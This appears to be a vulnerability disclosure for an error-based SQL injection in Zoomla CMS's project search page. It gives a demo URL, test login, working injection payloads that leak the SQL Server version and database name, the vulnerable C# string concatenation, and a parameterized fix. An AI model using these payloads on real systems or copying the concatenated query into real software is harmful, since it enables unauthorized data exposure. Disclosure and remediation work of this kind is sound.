### Summary:

SQL injection in the latest version of Zoomla CMS (逐浪cms)

### Details:

Visit

```
http://demo.zoomla.cn/User/login.aspx
```

and log in with the test account

```
test123
```

```
111111
```

Then visit

```
http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx
```

In the keyword field, enter

```
1' and (select @@version)>0--
```

![73.png](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png)

Click Search. The keyword is concatenated straight into the `like '%...%'` clause, so the statement that reaches SQL Server is `select * from [ZL_Project] where ProjectName like '%1' and (select @@version)>0--%'`. SQL Server has to convert the `@@version` string to an integer for the `> 0` comparison, fails, and echoes the string in the conversion error (error-based injection).

![74.png](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png)

Entering

```
1' and (select db_name())>0--
```

leaks the database name the same way.

![75.png](https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png)

The relevant code is as follows. The search handler passes the keyword through untouched:

```csharp
protected void Search_Click(object sender, EventArgs e)
{
    string keyWord = this.SearchValue.Text.Trim(); // not sanitized or escaped
    int type = DataConverter.CLng(this.DLType.SelectedValue);
    DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; // follow this call
    this.Egv.DataSource = defaultView;
    this.Egv.DataKeyNames = new string[] { "ProjectID" };
    this.Egv.DataBind();
}
```

and `ProjectSearch` concatenates it into the WHERE clause for every search type, including the numeric `ProjectID` case:

```csharp
public DataTable ProjectSearch(int Type, string KeyWord)
{
    string str = string.Empty;
    switch (Type)
    {
        case 0:
            str = "ProjectName like '%" + KeyWord + "%'";
            break;
        case 1:
            str = "StartDate like '%" + KeyWord.Trim() + "%'";
            break;
        case 2:
            str = "ProjectID=" + KeyWord;
            break;
        case 3:
            str = "ProjectIntro like '%" + KeyWord + "%'";
            break;
        case 4:
            str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')";
            break;
        default:
            str = "ProjectName like '%" + KeyWord + "%'";
            break;
    }
    string cmdText = "select * from [ZL_Project] where " + str;
    return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null); // KeyWord is injected verbatim into cmdText
}
```

### Proof of vulnerability:

See the details above.
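For comparison, here is how `ProjectSearch` looks when the keyword is bound as a query parameter instead of concatenated. This is an added example, not Zoomla's own code or a vendor patch: it replaces the project's `SqlHelper` with `System.Data.SqlClient` directly, the connection string is assumed to be supplied by the caller, and only the table and column names are taken from the report above. The LIKE wildcards are appended in SQL (`'%' + @kw + '%'`), so the user value can never be parsed as SQL text, and the `ProjectID` case is parsed as an integer before it is sent.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not part of Zoomla CMS: a parameterized replacement for ProjectSearch.
public class ProjectSearchFixed
{
    private readonly string connectionString; // assumption: provided by the caller

    public ProjectSearchFixed(string connectionString)
    {
        this.connectionString = connectionString;
    }

    // Same search types as the vulnerable method, but every clause refers to a
    // parameter; no user-controlled text is ever spliced into the statement.
    public static string BuildWhere(int type)
    {
        switch (type)
        {
            case 1: return "StartDate LIKE '%' + @kw + '%'";
            case 2: return "ProjectID = @id";
            case 3: return "ProjectIntro LIKE '%' + @kw + '%'";
            case 4: return "UserID IN (SELECT UserID FROM ZL_User WHERE UserName LIKE '%' + @kw + '%')";
            case 0:
            default: return "ProjectName LIKE '%' + @kw + '%'";
        }
    }

    // Escapes T-SQL LIKE metacharacters so a user-supplied %, _ or [ cannot widen the
    // match. "[" must be handled first, otherwise the brackets added for % and _ would
    // themselves be escaped again.
    public static string EscapeLike(string value)
    {
        return value.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    public DataTable ProjectSearch(int type, string keyWord)
    {
        string cmdText = "SELECT * FROM [ZL_Project] WHERE " + BuildWhere(type);
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(cmdText, conn))
        {
            cmd.CommandType = CommandType.Text;
            if (type == 2)
            {
                int id;
                // A payload such as "1' and (select @@version)>0--" is not an integer
                // and is rejected here instead of reaching the database.
                if (!int.TryParse(keyWord.Trim(), out id))
                    return new DataTable();
                cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            }
            else
            {
                cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value = EscapeLike(keyWord.Trim());
            }

            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table);
            return table;
        }
    }
}
```

With this version the report's payload `1' and (select @@version)>0--` is sent as the literal value of `@kw`, so the query simply looks for project names containing that text and returns nothing. The `EscapeLike` step is separate from the injection fix: parameters alone already stop injection, but without escaping a single `%` keyword would still match every row.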